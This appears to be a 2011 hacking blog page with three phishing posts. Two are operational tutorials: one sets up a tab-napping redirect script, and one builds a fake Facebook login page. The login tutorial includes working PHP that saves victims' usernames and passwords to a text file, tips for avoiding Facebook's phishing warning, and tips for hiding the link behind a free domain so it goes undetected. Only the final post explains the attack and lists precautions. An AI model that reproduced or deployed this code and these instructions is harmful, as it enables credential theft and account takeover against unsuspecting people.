Showing posts with label Phishing. Show all posts
Showing posts with label Phishing. Show all posts

HOW TO SETUP A TAB-NAPPING SCRIPT


Tab napping is a type of  phishing scam that does not require a victim to click on any url so that he / she is redirect you to a  phishing site . Instead it relies on the fact that a lot of people use tabbed browsing (Opening multiple tabs while browsing). In a tab napping scam, one of your inactive tabs is automatically replaced by with a new tab without your knowledge. 
To know more about tab Napping, you can check my earlier article here

How to setup a Tab Napping Script
1. Create an Ordinary phisher

  • First of all, you need to prepare a normal traditional phisher. In this tutorial, I will assume that you already know how to create a phishing page. If you don't know how, then go through my earlier tutorial on how to make a phisher .

2. Install the Script
  • Download the Tab Napping script here
  • Open the text file containing the script with a text editor like Notepad and search for the lines below;
timerPoll = setInterval("pollActivity()",1); //poll scrolling
timerRedirect =setInterval("location.href='http://username.site.com/fakepage.htm'",10000);


  • Now in the above script, replace http://username.site.com/fakepage.htm with your phishing url


Note that 10000 is the default time in milliseconds, that it will take before the victim's idle tab automatically redirects to your phishing page. Therefore you can modify the idle time too.. 


10000 milliseconds = 10 seconds
  • After you have edited the script, copy and paste it into the HTML of your site or blogger site
Thats it! your trap is set man!!! :xD
Read More | comments

HOW TO MAKE A PHISHER | HACK FACEBOOK, GMAIL e.tc | TUTORIAL

WHAT IS PHISHING?
Phishing is a technique or a way of attempting to acquire sensitive or confidential information such as usernames, passwords, and credit card details by false pretence as a trustworthy entity in an electronic communication. This is done with the help of a phisher.


WHAT IS A PHISHER?
A phisher is something that looks exactly like an Original login page (fake page), that writes the victim's login data (Username and Password) to a specific file, or does whatever you want so long as you get access to the victim's login data.
Here is an example of a fake facebook login page (phisher)

HOW TO MAKE A PHISHER?
As the saying goes:
  • Dont give plenty of FISH to your friend,. Instead, you should teach him how to PHISH
Therefore, instead of  just giving you the download link to the already made phishing page,.. Am going to teach you how to make your own phishing page. Well, at the end of this tutorial, i will put a download link to my already made phishing pages but first you have to learn how to make your own phisher :D

To create a successful phisher, all you need is a PHP enabled siteNotepad on your computer and a brain.
You can download Notepad v5.9++ here

Here is a list of php enabled free hosting sites:

In this tutorial am going to fucus mainly on how to prepare a phishing attack on facebook, am going to use Mozilla firefox as the browser and http://my3gb.com as the hosting site, its much easier.

STEP 1 -Creating the fake page
  • Go to facebook's login page http://www.facebook.com
  • On the top left corner of your Firefox browser, Click File ->Save page As and save your page name as facebook.html
  • Open facebook.html Using Notepad and search for the word ''action''
You will find it on a line that looks like this;

class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form"

  • Now change the method to ''get'' and action to ''login.php'' so that you will have something that looks like this;
class="menu_login_container"><form method="get" action="login.php" id="login_form"
 STEP 2- Preparing the php script
  • To Create a php file, simply pasting the code below into your notepad. Then save it as login.php

------------------------------------------------------------------------------
<?php
header("Location: http://facebook.com/login.php ");
$handle = fopen("noobs.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


------------------------------------------------------------------------------

 Note that in the above script, ''phished.txt'' is the file on which all hacked usernames and passwords will be saved and ''https://facebook.com/login.php'' is the Original facebook url where your victim will be redircted to after clicking the login button on your fake page. But at the moment facebook has tightened its security where by your victim will get notified of a phishing attack and would therefore be prompted to change his password right after arriving from a phishing page.

To avoid this, you should redirect your victim to any other url which is not of facebook by replacing  https://facebook.com/login.php with any url. Choosing the url to redirect your victim to will all depend on the trick that you will use against your victim in the whole phishing proccess.

Please also note that this part is mainly for facebook , its ok with several other sites like gmail, hotmail e.t.c your victim will not get a warning message, including mobile facebook (http://m.facebook.com).

STEP 3- Create File where to save hacked passwords
  • Create an empty text file using notepad and rename it as phished
Note that when creating the text file, there is no need of renaming it as phished.txt because the fact that you will save it as a text file is enough to make it bear the extension of txt

Now you have 3 files so far;
  1. facebook.html
  2. login.php
  3. phished.txt
 STEP 5- Uploading the 3 files

Now go to http://my3gb.com and sign up for a free hosting account the upload the 3 files as shown below


If your phisher has successfully been made, any email address and passwords that are typed on your fake page will be saved on the ''phished.txt'' file as shown in the image below

The link to your phishing page will therefore be; 
www.yourusername.my3gb.com/facebook.html

NOTE THAT:
  1. No One will be so dumb to click on such a link
  2. Facebook will automaticaly block your phishing url from being posted on facebook
To overcome the above sitiuation you need to rename your phishing link using a ''dot.tk'' domain. To be able to do this, go to www.dot.tk and register,. After that, login to your account and click on ''Add a new free domain now'' and follow the rest of the steps. 

Your dot.tk domain name will look like this,... www.anyname.tk , any clicks on this link will be fowarded to your fake facebook page.
The good part is that..
  • you can rename the phishing link to suite your victim's curiosity and there making it difficult for him to notice any phisher
  • Your phisher will NOT be detected and blocked by facebook,..so you are free to post it or send it to a freind on facebook via inbox.
Hope you enjoyed the tutorial,. you can now Download some of the already made phishing pages.
Read More | comments (2)

TAB NAPPING


An insecurity expert on Mozilla's Firefox web browser team has warned about a form of an advansed phishing attack also known as 'tab napping'.
  •  WAT IS TAB NAPPING?
  Unlike the traditional phishing that relies on getting users to click through on a URL that redirect to the phishing site and reveal their user credential, Tab napping relies on a fact that most people use tabbed browsing (Openning multiple tabs while browsing)
  • HOW DOES TAB NAPPING WORK?
During a tab napping attack, One of the inactive tabs is replaced by a phishing page without the user's knowladge. For example one of your inactive tab in which you have opened your facebook account will be automatically replaced with the phishing login page that looks exactly like that of facebook and you will be asked to enter your Username and password. Once these details are entered, they will be sent to the hacker & you will be redirected to the Original facebook
  •  HOW TO PREVENT THIS ATTACK?
Tab napping always takes advantage the user's assumption that a tabbed web page stays the same when other Internet services are being accessed. Therefore to protect yourself from this type of an attack, you always have to;
  1. Log out & close the tab when it is unusable
  2. Always Check the url when returning from another tab, make sure it is on secure connection (https://site.com)
  3. Close & open a new tab if u notice anything unussual about the url 
  4. Format the habit of openning multiple tabs unnecessarily when browsing the web
Read More | comments

Total Pageviews

Free Automatic Backlink Free Auto Backlink
japanese instant free backlink
Free Automatic Backlink Service Malaysia Free Backlink ServicesFree Promotion LinkFree Smart Automatic BacklinkMAJLIS LINK: Do Follow BacklinkLink Portal Teks TVAutoBacklinkGratisjapanese instant free backlink Free Plugboard Link Banner Button

 
Copyright © 2011. Ethical Hacking Unleashed . All Rights Reserved.
Company Info | Contact Us | Privacy policy | Term of use | Widget | Advertise with Us | Site map
Template modify by Creating Website